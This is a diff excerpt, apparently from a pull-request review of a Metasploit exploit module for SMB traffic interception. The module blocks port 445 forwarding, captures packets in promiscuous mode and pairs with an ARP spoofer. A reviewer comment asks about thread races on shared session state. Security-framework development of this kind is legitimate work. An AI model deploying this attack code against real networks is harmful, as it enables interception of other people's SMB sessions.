modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,649 @@
+      ])
+
+    deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','SECRET','GATEWAY_PROBE_HOST','GATEWAY_PROBE_PORT','TIMEOUT')
+  end
+
+  def exploit
+    print_good("INFO : Warming up...")
+    print_error("WARNING : Not running as Root. This can cause socket permission issues.") unless Process.uid == 0
+    @sessions = {}
+    @main_threads = []
+    @interface = datastore['INTERFACE'] || Pcap.lookupdev
+    raise "ERROR : Interface not found: #{@interface}" unless Socket.getifaddrs.map(&:name).include? @interface
+    @ip4 = ipv4_addresses[@interface]&.first
+    raise "ERROR : Interface does not have address: #{@interface}" unless @ip4&.count(".") == 3
+    @mac = get_mac(@interface)
+    # For future cross LAN work: (Gateway is required.)
+    #raise "ERROR : Interface does not have mac: #{@interface}" unless @mac
+    #@gateip4 = datastore['GATEWAY']
+    #raise "ERROR : Invalid Gateway ip address: #{@gateip4}" unless @gateip4&.count(".") == 3
+    #@gatemac = arp(tpa: @gateip4)
+    #raise "ERROR : Unable to retrieve Gateway mac address: #{@gateip4}" unless @gatemac && @gatemac.class == String
+    @share = datastore['SHARE']
+    print_status("Self: #{@ip4} | #{@mac}")
+    #print_status("Gateway: #{@gateip4} | #{@gatemac}")
+    disable_p445_fwrd
+    start_syn_capture
+    start_ack_capture
+    print_status("INFO : This module must be run alongside an arp spoofer / poisoner.")
+    print_status("INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.")
+    main_capture
+  end
+
+  # This prevents the TCP SYN on port 445 from passing through the filter.
+  # This allows us to have the time to modify the packets before forwarding them.
+  def disable_p445_fwrd
+    if RUBY_PLATFORM.include?("darwin")
+      IO.popen("pfctl -f -", "r+", err: "/dev/null") do |pfctl|
+        pfctl.write("block out on #{@interface} proto tcp from any to any port 445\n")
+        pfctl.close_write
+      end
+      IO.popen("pfctl -e", err: "/dev/null").close
+    elsif RUBY_PLATFORM.include?("nix")
+      %x{iptables -A INPUT -i #{@interface} -p tcp --destination-port 445 -j DROP}
+    else
+      print_error("WARNING : Platform not supported: #{RUBY_PLATFORM}")
+      print_error("WARNING : Port 445 forwarding must be blocked manually.")
+    end
+    print_good("INFO : Port 445 forwarding disabled.")
+    return true
+  end
+
+  # This starts the SYN capture thread as part of step two.
+  def start_syn_capture
+    @syn_capture_thread = Thread.new {
+      c = PacketFu::Capture.new(iface: @interface, promisc: true)
+      c.capture
+      c.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and dst port 445 and tcp[tcpflags] & (tcp-syn) != 0 and tcp[tcpflags] & (tcp-ack) == 0")
+      c.stream.each_data do |data|
+        packet = PacketFu::Packet.parse(data)
+        @sessions[packet.tcp_header.tcp_src] = {}
+        @sessions[packet.tcp_header.tcp_src][:acknum] = packet.tcp_header.tcp_ack
```

Comment:
Is there a potential of race conditions here? i.e. if multiple threads are modifying/reading the same `@sessions` state - would we need to place a mutex/semaphore around these reads/writes to eliminate race conditions